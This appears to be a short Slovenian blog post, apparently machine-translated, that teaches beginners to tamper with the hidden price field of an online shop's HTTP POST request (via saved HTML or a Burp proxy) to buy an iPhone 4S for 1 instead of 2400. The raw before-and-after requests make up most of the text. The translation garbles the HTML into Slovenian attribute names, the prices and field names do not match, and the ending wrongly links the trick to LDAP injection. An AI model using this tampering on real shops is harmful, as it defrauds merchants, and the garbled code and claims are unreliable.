Penetracija vdorov: Uporaba HTTP glav

Admin · Objavljeno na 7. 02. 2015 17:59:07

O uporabi HTTP glav

HTTP glava se pogosto uporablja v mehanizmu prenosa spletnih strani, vendar večina začetnikov na Kitajskem tega prispevka ni opazila; ta članek je namenjen le začetnikom, vlogi HTTP glave v procesu vdora.

Vzemimo za primer nakupovalno stran, da analiziramo majhen del vloge HTTP glav.

Najprej analizirajmo obrazec na strani za nakupovanje.

<form method="post" akcija="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br /> 

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<vhodni tip="hidden" ime="cena" vrednost="449">

<vrsta vhoda="oddaj" vrednost="Kupi">

</form>

Med postopkom odpiranja naredite posnetek zaslona njegove http glave sporočila in si ga oglejte

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

količina=1&cena=2400

Čeprav polje s ceno ni prikazano na strani ob odpiranju nakupovalne strani, ga lahko uporabnik še vedno ureja in upravlja.

Obstajata dva načina za dosego montaže

1. Shranite izvorno kodo HTML za spremembo in jo nato ponovno naložite v brskalnik za zagon

2. Uporaba prestrezanja proxyja za spreminjanje HTTP glav (konstrukcija proxyja v orodju burp)

Vzemimo zgornjo HTTP glavo kot primer
Pred spremembo
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

količina=1&cena=2400

Po spremembi
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

količina=1&cena=1

V zadnji vrstici ima polje Cena vrednost 2400 in če jo spremenimo na 1, lahko iPhone 4S dobimo po cenejši ceni.

Ta članek ponuja le predstavo o nepričakovanih koristih, kot je vbrizgavanje LDAP.

[Varnostni vodič] Penetracija vdorov: Uporaba HTTP glav

Sorodne objave

Ogledi odsekov